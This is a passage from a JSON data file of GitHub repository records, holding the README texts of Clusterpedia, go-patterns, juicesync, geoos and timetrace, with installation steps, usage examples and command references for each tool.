-o wide\nCLUSTER NAME READY UP-TO-DATE AVAILABLE AGE CONTAINERS IMAGES SELECTOR\ncluster-1 coredns 2/2 2 2 68d coredns registry.aliyuncs.com/google_containers/coredns:v1.8.4 k8s-app=kube-dns\n```\n\n**Find the related pods by the name of the deployment**\n\nFirst view the deployments in default namespace\n```sh\n$ kubectl --cluster cluster-1 get deployments\nNAME READY UP-TO-DATE AVAILABLE AGE\nfake-pod 3/3 3 3 104d\ntest-controller-manager 0/0 0 0 7d21h\n```\n\nUse `owner-name` to specify Owner Name and use `owner-seniority` to promote the Owner's seniority.\n```\n$ kubectl --cluster cluster-1 get pods -l \"search.clusterpedia.io/owner-name=fake-pod,search.clusterpedia.io/owner-seniority=1\" \nNAME READY STATUS RESTARTS AGE\nfake-pod-698dfbbd5b-74cjx 1/1 Running 0 12d\nfake-pod-698dfbbd5b-tmcw7 1/1 Running 0 3s\nfake-pod-698dfbbd5b-wvtvw 1/1 Running 0 3s\n```\n\nLean More About [Search by Parent or Ancestor Owner](https://clusterpedia.io/docs/usage/search/specified-cluster/#search-by-parent-or-ancestor-owner)\n\n### Search for [Collection Resource](https://clusterpedia.io/docs/concepts/collection-resource/)\nClusterpedia can also perform more advanced aggregation of resources. For example, you can use `Collection Resource` to get a set of different resources at once.\n\nLet's first check which `Collection Resource` currently Clusterpedia supports:\n```sh\n$ kubectl get collectionresources\nNAME RESOURCES\nany *\nworkloads deployments.apps,daemonsets.apps,statefulsets.apps\nkuberesources .*,*.admission.k8s.io,*.admissionregistration.k8s.io,*.apiextensions.k8s.io,*.apps,*.authentication.k8s.io,*.authorization.k8s.io,*.autoscaling,*.batch,*.certificates.k8s.io,*.coordination.k8s.io,*.discovery.k8s.io,*.events.k8s.io,*.extensions,*.flowcontrol.apiserver.k8s.io,*.imagepolicy.k8s.io,*.internal.apiserver.k8s.io,*.networking.k8s.io,*.node.k8s.io,*.policy,*.rbac.authorization.k8s.io,*.scheduling.k8s.io,*.storage.k8s.io\n```\n\nBy getting workloads, you can get a set of resources aggregated by `deployments`, `daemonsets`, and `statefulsets`, and `Collection Resource` also supports for all complex queries.\n\n**`kubectl get collectionresources workloads` will get the corresponding resources of all namespaces in all clusters by default:**\n```sh\n$ kubectl get collectionresources workloads\nCLUSTER GROUP VERSION KIND NAMESPACE NAME AGE\ncluster-1 apps v1 DaemonSet kube-system vsphere-cloud-controller-manager 63d\ncluster-2 apps v1 Deployment kube-system calico-kube-controllers 109d\ncluster-2 apps v1 Deployment kube-system coredns-coredns 109d\n```\n> Add the collection of Daemonset in cluster-1 and some of the above output is cut out\n\nDue to the limitation of kubectl, you cannot use complex queries in kubectl and can only be queried by `URL Query`.\n\n[Lean More](https://clusterpedia.io/docs/usage/search/collection-resource/)\n\n## Proposals\n### Perform more complex control over resources\nIn addition to resource search, similar to Wikipedia, Clusterpedia should also have simple capability of resource control, such as watch, create, delete, update, and more.\n\nIn fact, a write action is implemented by double write + warning response.\n\n**We will discuss this feature and decide whether we should implement it according to the community needs**\n\n## Notes\n### Multi-cluster network connectivity\nClusterpedia does not actually solve the problem of network connectivity in a multi-cluster environment. You can use tools such as [tower](https://github.com/kubesphere/tower) to connect and access sub-clusters, or use [submariner](https://github.com/submariner-io/submariner) or [skupper](https://github.com/skupperproject/skupper) to solve cross-cluster network problems.\n\n## Contact \nIf you have any question, feel free to reach out to us in the following ways:\n* [@cncf/clusterpedia slack](https://cloud-native.slack.com/messages/clusterpedia)\n\n> If you want to join the clusterpedia channel on CNCF slack, please **[get invite to CNCF slack](https://slack.cncf.io/)** and then join the [#clusterpedia](https://cloud-native.slack.com/messages/clusterpedia) channel.\n\n## Contributors\n\n\n \n\n\nMade with [contrib.rocks](https://contrib.rocks).\n\n## License\nCopyright 2022 the Clusterpedia Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bvwells/go-patterns", "link": "https://github.com/bvwells/go-patterns", "tags": ["golang", "go", "design-patterns", "patterns", "idioms"], "stars": 550, "description": "Design patterns for the Go programming language", "lang": "Go", "repo_lang": "", "readme": "# Design Patterns for Go\n \n[![go.dev reference](https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat-square)](https://pkg.go.dev/github.com/bvwells/go-patterns?tab=overview)\n![GitHub go.mod Go version](https://img.shields.io/github/go-mod/go-version/bvwells/go-patterns)\n![GitHub release (latest SemVer)](https://img.shields.io/github/v/release/bvwells/go-patterns) \n[![Build Status](https://app.travis-ci.com/bvwells/go-patterns.svg?branch=master)](https://app.travis-ci.com/bvwells/go-patterns)\n[![Build status](https://ci.appveyor.com/api/projects/status/ea2u4hpy555b6ady?svg=true)](https://ci.appveyor.com/project/bvwells/go-patterns)\n[![codecov](https://codecov.io/gh/bvwells/go-patterns/branch/master/graph/badge.svg)](https://codecov.io/gh/bvwells/go-patterns)\n[![Go Report Card](https://goreportcard.com/badge/github.com/bvwells/go-patterns)](https://goreportcard.com/report/github.com/bvwells/go-patterns)\n\nDesign patterns for the Go programming language.\n\n![Gopher jigsaw](jigsaw.png)\n\n``` go\nimport \"github.com/bvwells/go-patterns\"\n```\n\nTo install the packages on your system,\n\n```\n$ go get -u github.com/bvwells/go-patterns/...\n```\n\nDocumentation and examples are available at https://pkg.go.dev/github.com/bvwells/go-patterns?tab=overview\n\n * [Design Patterns](#design-patterns)\n * [Creational](#creational)\n * [Structural](#structural)\n * [Behavioral](#behavioral)\n * [Go Versions Supported](#go-versions-supported)\n\n## Design Patterns\n\nPattern | Package | Description\n-----------|-------------------------------------------|------------\nCreational | [`creational`][creational-ref] | Creational design patterns are design patterns that deal with object creation mechanisms, trying to create objects in a manner suitable to the situation. The basic form of object creation could result in design problems or in added complexity to the design. Creational design patterns solve this problem by somehow controlling this object creation.\nStructural | [`structural`][structural-ref] | Structural design patterns are design patterns that ease the design by identifying a simple way to realize relationships between entities.\nBehavioral | [`behavioral`][behavioral-ref] | Behavioral design patterns are design patterns that identify common communication patterns between objects and realize these patterns. By doing so, these patterns increase flexibility in carrying out this communication.\n\n## Creational [![go.dev reference](https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat-square)](https://pkg.go.dev/github.com/bvwells/go-patterns/creational?tab=overview)\n\nName | Description \n-----------|-------------------------------------------\n[`Abstract Factory`](./creational/abstract_factory.go) | Provide an interface for creating families of related or dependent objects without specifying their concrete classes.\n[`Builder`](./creational/builder.go) | Separate the construction of a complex object from its representation, allowing the same construction process to create various representations.\n[`Factory Method`](./creational/factory_method.go) | Define an interface for creating a single object, but let subclasses decide which class to instantiate. Factory Method lets a class defer instantiation to subclasses.\n[`Object Pool`](./creational/object_pool.go) | Avoid expensive acquisition and release of resources by recycling objects that are no longer in use. Can be considered a generalisation of connection pool and thread pool patterns.\n[`Prototype`](./creational/prototype.go) | Specify the kinds of objects to create using a prototypical instance, and create new objects from the 'skeleton' of an existing object, thus boosting performance and keeping memory footprints to a minimum.\n[`Singleton`](./creational/singleton.go) | Ensure a class has only one instance, and provide a global point of access to it.\n\n## Structural [![go.dev reference](https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat-square)](https://pkg.go.dev/github.com/bvwells/go-patterns/structural?tab=overview)\n\nName | Description \n-----------|-------------------------------------------\n[`Adapter`](./structural/adapter.go) | Convert the interface of a class into another interface clients expect. An adapter lets classes work together that could not otherwise because of incompatible interfaces. The enterprise integration pattern equivalent is the translator.\n[`Bridge`](./structural/bridge.go) | Decouple an abstraction from its implementation allowing the two to vary independently.\n[`Composite`](./structural/composite.go) | Compose objects into tree structures to represent part-whole hierarchies. Composite lets clients treat individual objects and compositions of objects uniformly.\n[`Decorator`](./structural/decorator.go) | Attach additional responsibilities to an object dynamically keeping the same interface. Decorators provide a flexible alternative to subclassing for extending functionality.\n[`Facade`](./structural/facade.go) | Provide a unified interface to a set of interfaces in a subsystem. Facade defines a higher-level interface that makes the subsystem easier to use.\n[`Flyweight`](./structural/flyweight.go) | Use sharing to support large numbers of similar objects efficiently.\n[`Proxy`](./structural/proxy.go) | Provide a surrogate or placeholder for another object to control access to it.\n\n## Behavioral [![go.dev reference](https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat-square)](https://pkg.go.dev/github.com/bvwells/go-patterns/behavioral?tab=overview)\n\nName | Description \n-----------|-------------------------------------------\n[`Chain of Responsibility`](./behavioral/chain_of_responsibility.go) | Avoid coupling the sender of a request to its receiver by giving more than one object a chance to handle the request. Chain the receiving objects and pass the request along the chain until an object handles it.\n[`Command`](./behavioral/command.go) | Encapsulate a request as an object, thereby allowing for the parameterization of clients with different requests, and the queuing or logging of requests. It also allows for the support of undoable operations.\n[`Interpreter`](./behavioral/interpreter.go) | Given a language, define a representation for its grammar along with an interpreter that uses the representation to interpret sentences in the language.\n[`Iterator`](./behavioral/iterator.go) | Provide a way to access the elements of an aggregate object sequentially without exposing its underlying representation.\n[`Mediator`](./behavioral/mediator.go) | Define an object that encapsulates how a set of objects interact. Mediator promotes loose coupling by keeping objects from referring to each other explicitly, and it allows their interaction to vary independently.\n[`Memento`](./behavioral/memento.go) | Without violating encapsulation, capture and externalize an object's internal state allowing the object to be restored to this state later.\n[`Observer`](./behavioral/observer.go) | Define a one-to-many dependency between objects where a state change in one object results in all its dependents being notified and updated automatically.\n[`State`](./behavioral/state.go) | Allow an object to alter its behavior when its internal state changes. The object will appear to change its class.\n[`Strategy`](./behavioral/strategy.go) | Define a family of algorithms, encapsulate each one, and make them interchangeable. Strategy lets the algorithm vary independently from clients that use it.\n[`Template Method`](./behavioral/template_method.go) | Define the skeleton of an algorithm in an operation, deferring some steps to subclasses. Template method lets subclasses redefine certain steps of an algorithm without changing the algorithm's structure.\n[`Visitor`](./behavioral/visitor.go) | Represent an operation to be performed on the elements of an object structure. Visitor lets a new operation be defined without changing the classes of the elements on which it operates.\n\n## Go Versions Supported\n\nThe most recent major version of Go is supported. You can see which versions are\ncurrently supported by looking at the lines following `go:` in\n[`.travis.yml`](.travis.yml).\n\n[creational-ref]: https://pkg.go.dev/github.com/bvwells/go-patterns/creational?tab=overview\n[structural-ref]: https://pkg.go.dev/github.com/bvwells/go-patterns/structural?tab=overview\n[behavioral-ref]: https://pkg.go.dev/github.com/bvwells/go-patterns/behavioral?tab=overview\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "juicedata/juicesync", "link": "https://github.com/juicedata/juicesync", "tags": [], "stars": 550, "description": "A tool to move your data between any clouds or regions.", "lang": "Go", "repo_lang": "", "readme": "# juicesync\n\n![build](https://github.com/juicedata/juicesync/workflows/build/badge.svg) ![release](https://github.com/juicedata/juicesync/workflows/release/badge.svg)\n\n`juicesync` is a tool to copy your data in object storage between any clouds or regions, it also supports local disk, SFTP, HDFS and many more.\n\nThis tool shares code with [`juicefs sync`](https://github.com/juicedata/juicefs), so if you are already using JuiceFS Community Edition, you should use `juicefs sync` instead.\n\nDue to release planning, `juicesync` may not contain the latest features and bug fixes of `juicefs sync`.\n\n## How does it work\n\n`juicesync` will scan all the keys from two object stores, and comparing them in ascending order to find out missing or outdated keys, then download them from the source and upload them to the destination in parallel.\n\n## Install\n\n### Homebrew\n\n```sh\nbrew install juicedata/tap/juicesync\n```\n\n### binary release\n\nFrom [here](https://github.com/juicedata/juicesync/releases)\n\n## Build from source\n\nJuicesync requires Go 1.16+ to build:\n\n```sh\ngo get github.com/juicedata/juicesync\n```\n\n## Upgrade\n\nPlease select the corresponding upgrade method according to different installation methods:\n\n* Use Homebrew to upgrade\n* Download a new version from [release page](https://github.com/juicedata/juicesync/releases)\n\n## Usage\n\nPlease check the [`juicefs sync` command documentation](https://juicefs.com/docs/community/administration/sync) for detailed usage.\n\nSRC and DST must be an URI of the following object storage:\n\n- file: local disk\n- sftp: FTP via SSH\n- s3: Amazon S3\n- hdfs: Hadoop File System (HDFS)\n- gcs: Google Cloud Storage\n- wasb: Azure Blob Storage\n- oss: Alibaba Cloud OSS\n- cos: Tencent Cloud COS\n- ks3: Kingsoft KS3\n- ufile: UCloud US3\n- qingstor: Qing Cloud QingStor\n- bos: Baidu Cloud Object Storage\n- qiniu: Qiniu Object Storage\n- b2: Backblaze B2\n- space: DigitalOcean Space\n- obs: Huawei Cloud OBS\n- oos: CTYun OOS\n- scw: Scaleway Object Storage\n- minio: MinIO\n- scs: Sina Cloud Storage\n- wasabi: Wasabi Object Storage\n- ibmcos: IBM Cloud Object Storage\n- webdav: WebDAV\n- tikv: TiKV\n- redis: Redis\n- mem: In-memory object store\n\nPlease check the full supported list [here](https://juicefs.com/docs/community/how_to_setup_object_storage#supported-object-storage).\n\nSRC and DST should be in the following format:\n\n[NAME://][ACCESS_KEY:SECRET_KEY@]BUCKET[.ENDPOINT][/PREFIX]\n\nSome examples:\n\n- `local/path`\n- `user@host:port:path`\n- `file:///Users/me/code/`\n- `hdfs://hdfs@namenode1:9000,namenode2:9000/user/`\n- `s3://my-bucket/`\n- `s3://access-key:secret-key-id@my-bucket/prefix`\n- `wasb://account-name:account-key@my-container/prefix`\n- `gcs://my-bucket.us-west1.googleapi.com/`\n- `oss://test`\n- `cos://test-1234`\n- `obs://my-bucket`\n- `bos://my-bucket`\n- `minio://myip:9000/bucket`\n- `scs://access-key:secret-key-id@my-bucket.sinacloud.net/prefix`\n- `webdav://host:port/prefix`\n- `tikv://host1:port,host2:port,host3:port/prefix`\n- `redis://localhost/1`\n- `mem://`\n\nNote:\n\n- It's recommended to run juicesync in the target region to have better performance.\n- Auto discover endpoint for bucket of S3, OSS, COS, OBS, BOS, `SRC` and `DST` can use format `NAME://[ACCESS_KEY:SECRET_KEY@]BUCKET[/PREFIX]`. `ACCESS_KEY` and `SECRET_KEY` can be provided by corresponding environment variables (see below).\n- When you get \"/\" in `ACCESS_KEY` or `SECRET_KEY` strings,you need to replace \"/\" with \"%2F\".\n- S3:\n * The access key and secret key for S3 could be provided by `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY`, or *IAM* role.\n- Wasb(Windows Azure Storage Blob)\n * The account name and account key can be provided as [connection string](https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string#configure-a-connection-string-for-an-azure-storage-account) by `AZURE_STORAGE_CONNECTION_STRING`.\n- GCS: The machine should be authorized to access Google Cloud Storage.\n- OSS:\n * The credential can be provided by environment variable `ALICLOUD_ACCESS_KEY_ID` and `ALICLOUD_ACCESS_KEY_SECRET` , RAM role, [EMR MetaService](https://help.aliyun.com/document_detail/43966.html).\n- COS:\n * The AppID should be part of the bucket name.\n * The credential can be provided by environment variable `COS_SECRETID` and `COS_SECRETKEY`.\n- OBS:\n * The credential can be provided by environment variable `HWCLOUD_ACCESS_KEY` and `HWCLOUD_SECRET_KEY` .\n- BOS:\n * The credential can be provided by environment variable `BDCLOUD_ACCESS_KEY` and `BDCLOUD_SECRET_KEY` .\n- Qiniu:\n The S3 endpoint should be used for Qiniu, for example, abc.cn-north-1-s3.qiniu.com.\n If there are keys starting with \"/\", the domain should be provided as `QINIU_DOMAIN`.\n- sftp: if your target machine uses SSH certificates instead of password, you should pass the path to your private key file to the environment variable `SSH_PRIVATE_KEY_PATH`, like ` SSH_PRIVATE_KEY_PATH=/home/someuser/.ssh/id_rsa juicesync [src] [dst]`.\n- Scaleway:\n * The credential can be provided by environment variable `SCW_ACCESS_KEY` and `SCW_SECRET_KEY` .\n- MinIO:\n * The credential can be provided by environment variable `MINIO_ACCESS_KEY` and `MINIO_SECRET_KEY` .\n", "readme_type": "markdown", "hn_comments": "This looks like a clone of rclone that supports fewer services, built by a company whose main product is a proprietary filesystem.I'm wondering how this is better than rclone?Hello,\nWhat is the benefits comparing with rclone? I think rclone can do much much more and also free and open source", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "spatial-go/geoos", "link": "https://github.com/spatial-go/geoos", "tags": ["geometry-library", "gis", "geospatial", "golang"], "stars": 550, "description": "A library provides spatial data and geometric algorithms", "lang": "Go", "repo_lang": "", "readme": "# Geoos\n\u6211\u4eec\u7684\u7ec4\u7ec7`spatial-go`\u6b63\u5f0f\u6210\u7acb\uff0c\u8fd9\u662f\u6211\u4eec\u7684\u7b2c\u4e00\u4e2a\u5f00\u6e90\u9879\u76ee`Geoos`,`Geoos`\u63d0\u4f9b\u6709\u5173\u7a7a\u95f4\u6570\u636e\u548c\u51e0\u4f55\u7b97\u6cd5,\u4f7f\u7528`Go`\u8bed\u8a00\u5305\u88c5\u5b9e\u73b0\u3002\n\u6b22\u8fce\u5927\u5bb6\u4f7f\u7528\u5e76\u63d0\u51fa\u5b9d\u8d35\u610f\u89c1\uff01\n\n## \u5185\u5bb9\u5217\u8868\n - [\u5185\u5bb9\u5217\u8868](#\u5185\u5bb9\u5217\u8868)\n - [\u76ee\u5f55\u7ed3\u6784](#\u76ee\u5f55\u7ed3\u6784)\n - [\u4f7f\u7528\u8bf4\u660e](#\u4f7f\u7528\u8bf4\u660e)\n - [\u7ef4\u62a4\u8005](#\u7ef4\u62a4\u8005)\n - [\u5982\u4f55\u8d21\u732e](#\u5982\u4f55\u8d21\u732e)\n - [\u4f7f\u7528\u8bb8\u53ef](#\u4f7f\u7528\u8bb8\u53ef)\n\n\n\n## \u76ee\u5f55\u7ed3\u6784\n1. `algorithm` \u662f\u5bf9\u5916\u66b4\u9732\u7684\u7a7a\u95f4\u8fd0\u7b97\u65b9\u6cd5\u5b9a\u4e49\u3002\n2. `strategy.go` \u5b9a\u4e49\u4e86\u7a7a\u95f4\u8fd0\u7b97\u5e95\u5c42\u7b97\u6cd5\u7684\u9009\u62e9\u5b9e\u73b0\u3002\n\n## \u4f7f\u7528\u8bf4\u660e\n\u4ee5\u8ba1\u7b97\u9762\u79ef`Area`\u4e3a\u4f8b\u3002\n```\npackage main\n\nimport (\n\t\"bytes\"\n\t\"fmt\"\n\n\t\"github.com/spatial-go/geoos/geoencoding\"\n\t\"github.com/spatial-go/geoos/planar\"\n)\n\nfunc main() {\n\t// First, choose the default algorithm.\n\tstrategy := planar.NormalStrategy()\n\t// Secondly, manufacturing test data and convert it to geometry\n\tconst polygon = `POLYGON((-1 -1, 1 -1, 1 1, -1 1, -1 -1))`\n\t// geometry, _ := wkt.UnmarshalString(polygon)\n\n\tbuf0 := new(bytes.Buffer)\n\tbuf0.Write([]byte(polygon))\n\tgeometry, _ := geoencoding.Read(buf0, geoencoding.WKT)\n\n\t// Last\uff0c call the Area () method and get result.\n\tarea, e := strategy.Area(geometry)\n\tif e != nil {\n\t\tfmt.Printf(e.Error())\n\t}\n\tfmt.Printf(\"%f\", area)\n\t// get result 4.0\n}\n```\nExample: geoencoding\n[example_encoding.go](https://github.com/spatial-go/geoos/example/example_encoding.go)\n\n## \u7ef4\u62a4\u8005\n\n[@spatial-go](https://github.com/spatial-go)\u3002\n\n\n## \u5982\u4f55\u8d21\u732e\n\n\u6211\u4eec\u4e5f\u5c06\u79c9\u627f\u201c\u5f00\u653e\u3001\u5171\u521b\u3001\u5171\u8d62\u201d\u7684\u76ee\u6807\u7406\u5ff5\u5728\u7a7a\u95f4\u8ba1\u7b97\u9886\u57df\u8d21\u732e\u81ea\u5df1\u7684\u4e00\u4efd\u529b\u91cf\u3002\n\n\u975e\u5e38\u6b22\u8fce\u4f60\u7684\u52a0\u5165\uff01[\u63d0\u4e00\u4e2a Issue](https://github.com/spatial-go/geoos/issues/new)\n\n\u8054\u7cfb\u90ae\u7bb1\uff1a [geoos@changjing.ai](mailto:geoos@changjing.ai)\n\n## \u4f7f\u7528\u8bb8\u53ef\n\n[LGPL-2.1 ](LICENSE)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dominikbraun/timetrace", "link": "https://github.com/dominikbraun/timetrace", "tags": ["time-tracker", "timetracker", "time-tracking", "cli", "timetracking", "hacktoberfest"], "stars": 550, "description": "A simple CLI for tracking your working time.", "lang": "Go", "repo_lang": "", "readme": "

:alarm_clock: timetrace\n\n\n\n\n

\n\n> timetrace is a simple CLI for tracking your working time.\n\n![CLI screenshot 64x16](timetrace.png)\n\n:fire: **New:** [Add tags for records](#start-tracking) \n:fire: **New:** [Use decimal hours when displaying durations](#prefer-decimal-hours-for-status-and-reports) \n:fire: **New:** [Restore records when restoring the associated project](#delete-a-project) \n:fire: **New:** [Support for per-project configuration](#per-project-configuration) \n\n---\n\n- [Installation](#installation)\n - [Homebrew](#homebrew)\n - [Snap](#snap)\n - [AUR](#aur)\n - [Scoop](#scoop)\n - [Docker](#docker)\n - [Binary](#binary)\n- [Usage example](#usage-example)\n - [Project modules](#project-modules)\n- [Shell integration](#shell-integration)\n - [Starship](#starship)\n- [Command reference](#command-reference)\n - [Start tracking](#start-tracking)\n - [Print the tracking status](#print-the-tracking-status)\n - [Stop tracking](#stop-tracking)\n - [Create a project](#create-a-project)\n - [Create a record](#create-a-record)\n - [Get a project](#get-a-project)\n - [Get a record](#get-a-record)\n - [List all projects](#list-all-projects)\n - [List all records from a date](#list-all-records-from-a-date)\n - [Edit a project](#edit-a-project)\n - [Edit a record](#edit-a-record)\n - [Delete a project](#delete-a-project)\n - [Delete a record](#delete-a-record)\n - [Generate a report `[beta]`](#generate-a-report-beta)\n - [Print version information](#print-version-information)\n- [Configuration](#configuration)\n - [Prefer 12-hour clock for storing records](#prefer-12-hour-clock-for-storing-records)\n - [Prefer decimal hours for status and reports](#prefer-decimal-hours-for-status-and-reports)\n - [Set your preferred editor](#set-your-preferred-editor)\n - [Configure defaults for projects](#configure-defaults-for-projects)\n- [Credits](#credits)\n\n---\n\n## Installation\n\n### Homebrew\n\n```\nbrew tap dominikbraun/timetrace\nbrew install timetrace\n```\n\n### Snap\n\n```\nsudo snap install timetrace --edge --devmode\n```\n\n### AUR\n\n```\nyay -S timetrace-bin\n```\n\n### Scoop\n\n```\nscoop bucket add https://github.com/Br1ght0ne/scoop-bucket\nscoop install timetrace\n```\n\n### Docker\n\nThe timetrace Docker image stores all data in the `/data` directory. To persist\nthis data on disk, you should create a bind mount or named volume like so:\n\n```\ndocker container run -v my-volume:/data dominikbraun/timetrace version\n```\n\n### Binary\n\nDownload the [latest release](https://github.com/dominikbraun/timetrace/releases)\nand extract the binary into a directory like `/usr/local/bin` or\n`C:\\Program Files\\timetrace`. Make sure the directory is in the `PATH` variable.\n\n## Usage example\n\nFirst, create a project you're working for:\n\n```\ntimetrace create project make-coffee\n```\n\nOnce the project is created, you're able to track work on that project.\n\n```\ntimetrace start make-coffee\n```\n\nYou can obtain your currently worked time using `timetrace status`. When you've\nfinished your work, stop tracking:\n\n```\ntimetrace stop\n```\n\n### Project modules\n\nTo refine what part of a project you're working on, timetrace supports _project modules_. These are the exact same thing\nas normal projects, except that they have a key in the form `@`.\n\nCreating a `grind-beans` module for the `make-coffee` project is simple:\n\n```\ntimetrace create project grind-beans@make-coffee\n```\n\nThe new module will be listed as part of the `make-coffee` project:\n\n```\ntimetrace list projects\n+-----+-------------+-------------+\n| # | KEY | MODULES |\n+-----+-------------+-------------+\n| 1 | make-coffee | grind-beans |\n+-----+-------------+-------------+\n\n```\n\nWhen filtering by projects, for example with `timetrace list records -p make-coffee today`, the modules of that project\nwill be included.\n\n## Shell integration\n\n### Starship\n\nTo integrate timetrace into Starship, add the following lines to `$HOME/.config/starship.toml`:\n\n```\n[custom.timetrace]\ncommand = \"\"\" timetrace status --format \"Current project: {project} - Worked today: {trackedTimeToday}\" \"\"\"\nwhen = \"timetrace status\"\nshell = \"sh\"\n```\n\nYou can find a list of available formatting variables in the [`status` reference](#print-the-tracking-status).\n\n## Command reference\n\n### Start tracking\n\n**Syntax:**\n\n```\ntimetrace start [+TAG1, +TAG2, ...]\n```\n\n**Arguments:**\n\n| Argument | Description |\n| ------------------- | -------------------------------------------- |\n| `PROJECT KEY` | The key of the project. |\n| `+TAG1, +TAG2, ...` | One or more optional tags starting with `+`. |\n\n**Flags:**\n\n| Flag | Short | Description |\n| ---------------- | ----- | ---------------------------------------------------------------------------------------------------------- |\n| `--billable` | `-b` | Mark the record as billable. |\n| `--non-billable` | | Mark the record as non-billable, even if the project is [billable by default](#per-project-configuration). |\n\n**Example:**\n\nStart working on a project called `make-coffee` and mark it as billable:\n\n```\ntimetrace start --billable make-coffee\n```\n\nStart working on the `make-coffee` project and add two tags:\n\n```\ntimetrace start make-coffee +espresso +morning\n```\n\n### Print the tracking status\n\n**Syntax:**\n\n```\ntimetrace status\n```\n\n**Flags:**\n\n| Flag | Short | Description |\n| ---------- | ----- | ------------------------------------------------------------- |\n| `--format` | `-f` | Display the status in a custom format (see below). |\n| `--output` | `-o` | Display the status in a specific output. Valid values: `json` |\n\n**Formatting variables:**\n\nThe names of the formatting variables are the same as the JSON keys printed by `--output json`.\n\n| Variable | Description |\n| ---------------------- | ---------------------------------------- |\n| `{project}` | The key of the current project. |\n| `{trackedTimeCurrent}` | The time tracked for the current record. |\n| `{trackedTimeToday}` | The time tracked today. |\n| `{breakTimeToday}` | The break time since the first record. |\n\n**Example:**\n\nPrint the current tracking status:\n\n```\ntimetrace status\n+-------------------+----------------------+----------------+\n| CURRENT PROJECT | WORKED SINCE START | WORKED TODAY |\n+-------------------+----------------------+----------------+\n| make-coffee | 1h 15min | 4h 30min |\n+-------------------+----------------------+----------------+\n```\n\nPrint the current project and the total working time as a custom string. Given the example above, the output will be\n`Current project: make-coffee - Worked today: 3h 30min`.\n\n```\ntimetrace status --format \"Current project: {project} - Worked today: {trackedTimeToday}\"\n```\n\nPrint the status as JSON:\n\n```\ntimetrace status -o json\n```\n\nThe output will look as follows:\n\n```json\n{\n \"project\": \"web-store\",\n \"trackedTimeCurrent\": \"1h 45min\",\n \"trackedTimeToday\": \"7h 30min\",\n \"breakTimeToday\": \"0h 30min\"\n}\n```\n\n### Stop tracking\n\n**Syntax:**\n\n```\ntimetrace stop\n```\n\n**Example:**\n\nStop working on your current project:\n\n```\ntimetrace stop\n```\n\n### Create a project\n\n**Syntax:**\n\n```\ntimetrace create project \n```\n\n**Arguments:**\n\n| Argument | Description |\n| -------- | ---------------------- |\n| `KEY` | An unique project key. |\n\n**Example:**\n\nCreate a project called `make-coffee`:\n\n```\ntimetrace create project make-coffee\n```\n\n### Create a record\n\n:warning: You shouldn't use this command for normal tracking but only for belated records.\n\n**Syntax:**\n\n```\ntimetrace create record {|today|yesterday} \n```\n\n**Arguments:**\n\n| Argument | Description |\n| ------------- | -------------------------------------------------------------------------------- |\n| `PROJECT KEY` | The project key the record should be created for. |\n| `YYYY-MM-DD` | The date the record should be created for. Alternatively `today` or `yesterday`. |\n| `HH:MM` | The start time of the record. |\n| `HH:MM` | The end time of the record. |\n\n**Example:**\n\nCreate a record for the `make-coffee` project today from 07:00 to 08:30:\n\n```\ntimetrace create record make-coffee today 07:00 08:30\n```\n\n### Get a project\n\n**Syntax:**\n\n```\ntimetrace get project \n```\n\n**Arguments:**\n\n| Argument | Description |\n| -------- | ---------------- |\n| `KEY` | The project key. |\n\n**Example:**\n\nDisplay a project called `make-coffee`:\n\n```\ntimetrace get project make-coffee\n```\n\n### Get a record\n\n**Syntax:**\n\n```\ntimetrace get record \n```\n\n**Arguments:**\n\n| Argument | Description |\n| ------------------ | ------------------------------------- |\n| `YYYY-MM-DD-HH-MM` | The start time of the desired record. |\n\n**Example:**\n\nBy default, records can be accessed using the 24-hour format, meaning 3:00 PM is 15. Display a record created on May 1st 2021, 3:00 PM:\n\n```\ntimetrace get record 2021-05-01-15-00\n```\n\nThis behavior [can be changed](#prefer-12-hour-clock-for-storing-records).\n\n### List all projects\n\n**Syntax:**\n\n```\ntimetrace list projects\n```\n\n**Example:**\n\nList all projects stored within the timetrace filesystem:\n\n```\ntimetrace list projects\n+---+-------------+\n| # | KEY |\n+---+-------------+\n| 1 | make-coffee |\n| 2 | my-website |\n| 3 | web-shop |\n+---+-------------+\n```\n\n### List all records from a date\n\n**Syntax:**\n\n```\ntimetrace list records {|today|yesterday}\n```\n\n**Arguments:**\n\n| Argument | Description |\n| ------------ | ----------------------------------------------------------- |\n| `YYYY-MM-DD` | The date of the records to list, or `today` or `yesterday`. |\n| today | List today's records. |\n| yesterday | List yesterday's records. |\n\n**Flags:**\n\n| Flag | Short | Description |\n| ------------ | ----- | ------------------------------ |\n| `--billable` | `-b` | only display billable records. |\n| `--project` | `-p` | filter records by project key. |\n\n**Example:**\n\nDisplay all records created on May 1st 2021:\n\n```\ntimetrace list records 2021-05-01\n+-----+-------------+---------+-------+------------+\n| # | PROJECT | START | END | BILLABLE |\n+-----+-------------+---------+-------+------------+\n| 1 | my-website | 17:30 | 21:00 | yes |\n| 2 | my-website | 08:31 | 17:00 | no |\n| 3 | make-coffee | 08:25 | 08:30 | no |\n+-----+-------------+---------+-------+------------+\n```\n\nFilter records by the `make-coffee` project:\n\n```\ntimetrace list records -p make-coffee 2021-05-01\n+-----+-------------+---------+-------+------------+\n| # | PROJECT | START | END | BILLABLE |\n+-----+-------------+---------+-------+------------+\n| 1 | make-coffee | 08:25 | 08:30 | no |\n+-----+-------------+---------+-------+------------+\n```\n\nThis will include records for [project modules](#project-modules) like `grind-beans@make-coffee`.\n\n### Edit a project\n\n**Syntax:**\n\n```\ntimetrace edit project \n```\n\n**Arguments:**\n\n| Argument | Description |\n| -------- | ---------------- |\n| `KEY` | The project key. |\n\n**Flags:**\n| Flag | Short | Description |\n| ---------- | ----- | ------------------------------------------------------- |\n| `--revert` | `-r` | Revert the project to its state prior to the last edit. 